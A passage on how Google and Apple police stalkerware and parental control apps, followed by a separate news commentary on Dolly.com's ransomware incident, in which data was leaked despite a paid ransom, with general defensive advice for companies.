Google and Apple are generally quick to tackle malicious apps that manage to avoid the privacy and security protections imposed in their respective official app stores.

Several years ago, Google removed seven apps from the Play Store that were marketed as employee and child trackers. The tech giant took a dim view of their overreaching functions -- including GPS device tracking, access to SMS messages, theft of contact lists, and potentially the exposure of communication taking place in messaging applications. Google has also banned stalkerware ads. However, some apps still apparently slip through the net.

Google's Threat Analysis Group is constantly publishing research on new commercial spyware strains and their potential targets.

Apple has cracked down on parental control apps, citing privacy-invading functions as the reason for removal. The company offers its own parental device control service called Screen Time for parents who want to limit their child's device usage. Furthermore, the company does not allow sideloading -- that is, the installing of third-party apps from sources other than Apple's App Store.

In 2022, Apple revealed the details of a $10 million grant to research ways to combat state-sponsored spyware.

Are parental control apps spyware?
There are threats and inappropriate material around every corner online, and while children often want a smartphone and to be on social media at a young age, parents want to be able to monitor what they are viewing and who they are interacting with online. This, in itself, is responsible, but at the core, parental control apps are designed for surveillance.

The main issue is the capacity for abuse. Standalone parental control apps can be abused and the permissions they require can be incredibly intrusive -- not only for children but in relation to anyone's privacy.

A balance between a right to privacy and protection has to be maintained, and it's a difficult tightrope to walk. Both Apple and Google have introduced parental controls for Android devices, Chromebooks, iPhones, and iPads. These platforms focus on restricting screen time, locking and unlocking devices, and features such as permissions list management, restricting web content and app downloads, and purchase approvals.

Dolly.com's ransomware attack and the betrayal of honor among thieves

LinkedIn.com by Jason Collins on November 11, 2023

Dolly.com, an on-demand moving and delivery platform, reportedly paid a ransom to attackers in exchange for deleting stolen customer data. However, the attackers broke their promise and released the data anyway. This incident highlights the betrayal of honor among thieves, which could harm companies' willingness to pay ransoms in the future.

Ransomware attacks have become increasingly common in recent years, and attackers are becoming more sophisticated and ruthless. In the past, there was an unwritten code of honor among thieves that dictated that attackers would uphold their end of the bargain if victims paid the ransom. However, this code of honor seems to be eroding, as evidenced by the Dolly.com attack.

The fact that the Dolly.com attackers broke their promise and released the data even after being paid is a worrying development. It could make companies less likely to pay ransoms in the future, making ransomware attacks even more costly and disruptive.

Impact on companies' willingness to pay ransoms

Companies are already facing a difficult decision when it comes to ransomware attacks. On the one hand, they may want to pay the ransom to avoid the disruption and reputational damage resulting from a data breach. On the other hand, they know that paying the ransom encourages attackers and could lead to more attacks in the future.

The Dolly.com attack makes this decision even more difficult. Companies now have to worry that even if they pay the ransom, the attackers may not uphold their end of the bargain. This could make companies less likely to pay ransoms, which could encourage attackers and lead to more attacks in an attempt to use the numbers game to find the one company that will pay.

How companies can mitigate the risks

There are many things that companies can do to mitigate the risks posed by ransomware attacks. These include:

* Implementing strong security measures to prevent attacks in the first place.
* Having a robust incident response plan in case of an attack.
* Maintaining a backup and recovery plan to minimize the disruption caused by an attack.
* Educating employees about cybersecurity best practices.

Companies should also be prepared to negotiate with attackers if they do fall victim to a ransomware attack. However, they should be aware that there is no guarantee that attackers will uphold their end of the bargain, even if a ransom is paid.

Conclusion

The Dolly.com ransomware attack reminds companies they cannot trust attackers to uphold their promises. This could harm companies' willingness to pay ransoms in the future, making ransomware attacks even more costly and disruptive.

Companies should take steps to mitigate the risks posed by ransomware attacks by implementing strong security measures, having a robust incident response plan, having a backup and recovery plan, and educating employees about cybersecurity best practices.